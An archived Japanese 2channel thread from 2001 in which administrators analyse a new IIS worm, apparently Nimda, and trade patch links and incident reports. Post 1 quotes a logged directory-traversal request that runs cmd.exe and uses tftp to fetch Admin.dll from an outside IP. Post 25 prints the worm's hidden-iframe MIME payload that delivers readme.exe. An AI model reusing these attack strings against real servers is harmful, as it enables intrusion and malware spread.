5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

このワームって何でしょうか?

1 :名無しさん@お腹いっぱい。:01/09/18 23:55
今日こんなログを見つけました。
CODEREDの穴を探して伝播するワームのようです。
ログにあったサイトからadmin.dllを頂いて解析してみたところ、
たしかに自己拡散を目的としたリソースが存在しています。


[2001/09/18 22:40:29] Undefine www
/_vti_bin/..%255c../..%255c../..%255c..
/winnt/system32/cmd.exe?
/c+tftp%20-i%2061.132.69.76%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0

2 :名無し:01/09/19 00:01
なんでしょうね?
子これは事件だ!

3 :名無しさん@お腹いっぱい。:01/09/19 00:03
位置位置スレッドをたてるな。コードレッドパート5 をミロ。氏ね池

4 :名無しさん@お腹いっぱい。:01/09/19 00:10
>>3
つーか新型だろこれ。

5 :名無しさん@お腹いっぱい。:01/09/19 00:12
ブルーもレッドもかわらない。

6 :名無しさん@お腹いっぱい。:01/09/19 00:13
CodeBlueともちがう。

7 :hoe:01/09/19 00:15
ftpしようとしてるの?

8 ::01/09/19 00:16
admin.dll中からREADME.EXEを送信するコード発見。

9 ::01/09/19 00:17
>>3,4は事態の深刻さが理解できていないようだ。

10 :名無しさん@お腹いっぱい。:01/09/19 00:18
別スレにも海田が、戻りヘッダを参照してIIS以外には一行しか送らない
ように作れなかったのか?
それとも、偽装等を防止しているのか?
これまでは一行だったから笑っていられたが、困ったもんだ。

11 :名無しさん@お腹いっぱい。:01/09/19 00:19
MSNがやられましたw
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

12 ::01/09/19 00:20
俺のIISレスポンスヘッダ動的に書き換えてApacheのふりしてるけど
ガンガン送られてきております。

13 :名無しさん@お腹いっぱい。:01/09/19 00:35
>>9
深刻という意味が違う。
MS製品を使用するユーザが多いことが深刻。

14 ::01/09/19 00:56
>>13
そういう問題じゃないと思われ。MSNの状態をみていると、
今回はワームの進化型でもあり、そのワームに汚染されたIISは
接続したクライアントにREADME.EXEという怪しいファイルを
送りつける破壊サーバに変貌するようだ。
結構破壊力抜群かも。

15 :怖くなった:01/09/19 01:09
Code青赤の発病として見ていいでしょうか?

16 ::01/09/19 01:26
>>15
だから違うっていってるだろ

17 :Codeラディン:01/09/19 01:33
15でし。
ちょっと他スレからあちこち読んでみました。ちがうぞ〜!はい。
えらい祭りになりそうです。アフガンといい、Nimdaといい、、、
やっぱりラディンがらみでしょうか。

18 ::01/09/19 02:09
社内緊急通報で明日アサイチで馬鹿がREADME.EXEダウンロード
しないように通知した・・・・。
俺の仕事は一向に進まない。つーかこんなことするために
残業してんじゃないんだ・・・・。

19 ::01/09/19 02:12
CERTの情報、WEBサーバのログ載せちゃいるが、肝心なとこが
切れてるな。tftp実行部ってIISのログには表示されんのか?

20 :名無しさん@お腹いっぱい。:01/09/19 02:12
明日社内のパソコンに全部パッチ当てないと・・・

21 : :01/09/19 02:13
折れもIE5.01&5.5使ってる奴はパッチ当てるように
userにメールした。でもわかんない人も多いだろうから、
明日朝市で逝って来ます。

22 :名無しさん@お腹いっぱい。:01/09/19 02:20
不正なMIMEヘッダ〜用のパッチはどれだっけ?

23 :>>22:01/09/19 02:24
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

24 :名無しさん@お腹いっぱい。:01/09/19 02:27
おお、ありがとう

25 ::01/09/19 03:00
tftpでもってきたadmin.dllが送出するヘッダ。
バイナリエディタで抜いたYO。

Content-Type: text/html;charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
Content-Type: audio/x-wav;name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:

なるほどなって感じ。

26 :え〜ん ◆EeeenOwI :01/09/19 14:05
結局これがコードグリーンか、もしくはCRクリーンの
どちらかの足跡じゃないの?
CRの方は消滅するらしいけどグリーンはいつまでも
残るみたいね。

27 ::01/09/19 15:20
>>26
せめてニュースサイトくらい嫁。

28 :え〜ん ◆EeeenOwI :01/09/19 17:40
>>27
そうかそうか
では何故このタイトルは「このワームって何でしょうか?」
ってなってるの?誰にきいてるの?
解決したらこのスレ終わり?

29 ::01/09/19 17:50
スレ立てた書き込み時刻は18日23:55で発生直後だろ。
立てる前には一通り他のスレみて酷似事例がないか探したさ。
でCodeBlueだろってマヌーな会話が繰り返されてる
だけだから新規でたてたの。その後解析したのも俺。
tftpを含むログがすでにどこかにでてたかい?
別にこのスレが終わってもなんとも思わんけど
シマンテックやトレンドよりは解析早かったはずだ。
まして逆切れするなんて えーん君らしくないよ。

30 :え〜ん ◆EeeenOwI :01/09/19 18:09
>>29
ごめんごめん、逆切れしたわけじゃないよ。
出張先からリモートで見たらヘンなログ出てきたな
ぐらいだったんで。
出張から帰って先にこの板見て、今うちのログの
お祭り騒ぎに目が点でした スマソ。

31 ::01/09/19 18:12
うちも今日はパニックだったよ。
もっとも午前1時に部長級は叩き起こしといたから
対策行動自体はありとスムーズだった。

32 :え〜ん ◆EeeenOwI :01/09/19 18:20
>>31
まいった、、調べたら知り合いのとこ1台やられてるようだ。
telでケーブル抜いてくれと言ったけど。
今から逝ってきます。。ヽ(;´д`)ノ

33 : :01/09/19 18:51
ノートンでチェックしたらVBS.Haptime.A@mmに感染してた。
今は検疫場所にあるんですが、どうしたらいいんでしょか?
対処法がさっぱりわからないんで教えてください。

34 : :01/09/19 18:54
>>33
マルチポスト反対!

35 :名無しさん@お腹いっぱい。:01/09/19 19:04
優秀な1がいるスレ。

36 ::01/09/19 19:08
今日一日みてて気づいたんだが、これってタイマ内蔵してるっぽいな。
23:00頃から大量に発生していた攻撃が、AM5:00頃を境にパターリと
途絶えた。ちょうど6時間。この後同一のホストからのアクセス
が、一様にHTTP Proveに切り替わっている。
推測だが再度23:00(GMT+9)に攻撃開始するという可能性が高い。
US時間でいうとAM9:00、つまりワーキングタイムの開始時刻だ。
今日汚染されたPCが、深夜に活動開始するってわけだ。
(日付参照で1回きり動作ならいいんだがな。)

37 ::01/09/19 19:17
×prove
○probe
鬱だもう帰宅したい。

38 :名無しさん@お腹いっぱい。:01/09/19 19:26
俺こういうのに疎くてこのワームの奴全然わかんないんだけど
2チャンの上の方に書いてあるやつでダウロードしろって
書いてある奴はどれをダウンロードすればいいの?
どれをダウンロードすればこのワームは防げるの?
そんでこれをダウンロードすると基本的に何が起こるの?
誰か教えてたもれ

39 :名無しさん@お腹いっぱい。:01/09/19 19:34
>>37=1 がんばってー。応援してるよっ!

40 :名無しさん@お腹いっぱい。:01/09/19 19:35
>>33
ここ見れ
http://www.symantec.com/region/jp/sarcj/data/v/vbs.haptime.a@mm.html

41 :40:01/09/19 19:37
ちゃんとリンクされてないみたいだから、コピペしてね

42 :え〜ん ◆EeeenOwI :01/09/19 20:32
あ〜終わった終わった

43 :え〜ん ◆EeeenOwI :01/09/19 20:33
あ〜終わった終わった
一応鯖はなんともなかったYO

44 :名無しさん@お腹いっぱい。:01/09/19 23:13
赤虫出まくりだった鯖、何回も警告メールだして、やっと来なくなったと思ったら
今度はw32.nimuda.a@mmが来まくっている・・・

ダメ管はいつまで経ってもダメ管なのかな?
それともパッチ一つで終わりとでも思っているのだろうか?
最悪、管理者がいないのか?(この可能性が一番高いな(鬱 )

ん?赤虫のパッチ当ててたら、ニムダは問題ないはずだし・・・(謎

45 :1:01/09/19 23:28
案の定活動開始した模様

46 :名無しさん@お腹いっぱい。:01/10/09 12:22
何でしょうか。

http://www.clubtgp.com/freehosting/nature/gallery.htm

47 :名無しさん@お腹いっぱい。:01/10/09 12:33
>>46
JS_Exception_Exploit
Microsoft VMの脆弱性をついたプログラム

踏むなよ

48 :ヘ-o-ヘ:01/10/09 13:30
http://www.msn.co.jp/topyom/blobs/www-img-topyom-01_20011009120741.gif
↑画面向かって右 サイコメトラーエイジさん

49 :名無しさん@お腹いっぱい。:01/10/09 23:41
ブルーもレッドもかわらない。

50 :ニンダ:01/10/10 09:53
Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339

51 :名無しさん@お腹いっぱい。:01/10/14 02:13
なっ、なんだよこれー(><)

http://www.panasonic.tcp.ne.jp/

52 :名無しさん@お腹いっぱい。:01/10/14 02:28
<HTML><BODY><META HTTP-EQUIV="Refresh" CONTENT="0;http://www.yahoo.co.jp/"></BODY></HTML>
これでループしてるらしい。

53 :名無しさん@お腹いっぱい。:01/10/15 14:05
>>52

この会社、なんでこんなへんなクラックされてるんだろ?

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)